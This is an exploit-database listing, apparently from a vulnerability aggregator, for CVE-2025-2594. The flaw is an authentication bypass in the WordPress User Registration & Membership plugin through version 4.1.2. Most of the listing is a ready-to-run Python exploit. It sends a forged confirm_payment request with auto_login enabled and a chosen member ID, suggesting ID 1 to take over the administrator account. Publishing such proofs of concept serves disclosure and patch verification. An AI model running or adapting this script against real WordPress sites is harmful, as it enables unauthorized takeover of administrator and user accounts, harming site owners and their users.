WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass

🗓️ 25 May 2025 00:00:00Reported by Mohammed Idrees BanyamerType

exploitdb🔗 www.exploit-db.com👁 381 Views

Exploit for WordPress User Registration Plugin 4.1.2 allows authentication bypass (CVE-2025-2594).

Reporter	Title	Published	Views	Family All 14
Circl	CVE-2025-2594	2 Apr 202517:00	–	circl
CNNVD	WordPress plugin User Registration & Membership 安全漏洞	22 Apr 202500:00	–	cnnvd
CVE	CVE-2025-2594	22 Apr 202506:00	–	cve
Cvelist	CVE-2025-2594 User Registration & Membership < 4.1.3 - Authentication Bypass	22 Apr 202506:00	–	cvelist
EUVD	EUVD-2025-12286	3 Oct 202520:07	–	euvd
NVD	CVE-2025-2594	22 Apr 202506:15	–	nvd
Packet Storm	📄 WordPress User Registration and Membership 4.1.2 Authentication Bypass	26 May 202500:00	–	packetstorm
Packet Storm	📄 WordPress User Registration and Membership 4.1.2 Authentication Bypass	6 Feb 202600:00	–	packetstorm
Patchstack	WordPress User Registration plugin < 4.1.3 - Authentication Bypass vulnerability	1 Apr 202517:57	–	patchstack
Patchstack	WordPress User Registration & Membership Pro plugin < 5.1.3 - Authentication Bypass vulnerability	1 Apr 202518:05	–	patchstack

#!/usr/bin/env python3
# Exploit Title: WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass
# Date: 2025-05-22
# Exploit Author: Mohammed Idrees Banyamer
# Vendor Homepage: https://wordpress.org/plugins/user-registration/
# Software Link: https://downloads.wordpress.org/plugin/user-registration.4.1.2.zip
# Version: <= 4.1.2
# Tested on: WordPress 6.x, Apache on Linux
# CVE: CVE-2025-2594

import requests
import sys
import argparse
from urllib.parse import urljoin
from termcolor import cprint, colored

def banner():
    cprint("┌──────────────────────────────────────────────┐", "cyan")
    cprint("│ WordPress Plugin User Registration <= 4.1.2   │", "cyan")
    cprint("│ Authentication Bypass Exploit (CVE-2025-2594)│", "cyan")
    cprint("│ Author: Mohammed Idrees Banyamer             │", "cyan")
    cprint("└──────────────────────────────────────────────┘", "cyan")

def exploit(target_url, member_id, nonce):
    endpoint = urljoin(target_url, "/wp-admin/admin-ajax.php")

    files = {
        'action': (None, 'user_registration_membership_confirm_payment'),
        'security': (None, nonce),
        'form_response': (None, '{"auto_login": true}'),
        'member_id': (None, str(member_id))
    }

    cprint(f"[+] Target URL: {endpoint}", "yellow")
    cprint(f"[+] Attempting to bypass authentication as user ID {member_id}...\n", "yellow")

    try:
        response = requests.post(endpoint, files=files, timeout=10)

        if response.status_code == 200 and '"success":true' in response.text:
            cprint("[✓] Exploit successful! Authentication bypass achieved.", "green")
            cprint("[!] Check your session/cookies - you may now be authenticated as the target user.\n", "green")
            print("Server Response:")
            print(response.text)
        else:
            cprint("[-] Exploit failed or invalid nonce/member_id.", "red")
            print("Server Response:")
            print(response.text)
    except requests.exceptions.RequestException as e:
        cprint(f"[!] Request failed: {e}", "red")

def main():
    banner()

    parser = argparse.ArgumentParser(description="CVE-2025-2594 - WordPress Plugin Authentication Bypass")
    parser.add_argument("target", help="Base target URL (e.g., http://localhost)")
    parser.add_argument("member_id", help="Target user ID (usually 1 for admin)")
    parser.add_argument("nonce", help="_confirm_payment_nonce value from registration page")

    args = parser.parse_args()

    exploit(args.target, args.member_id, args.nonce)

if __name__ == "__main__":
    main()

25 May 2025 00:00Current

7High risk

Vulners AI Score7

CVSS 3.18.1

EPSS0.28447

SSVC

WordPress User Registration &amp; Membership Plugin 4.1.2 - Authentication Bypass

WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass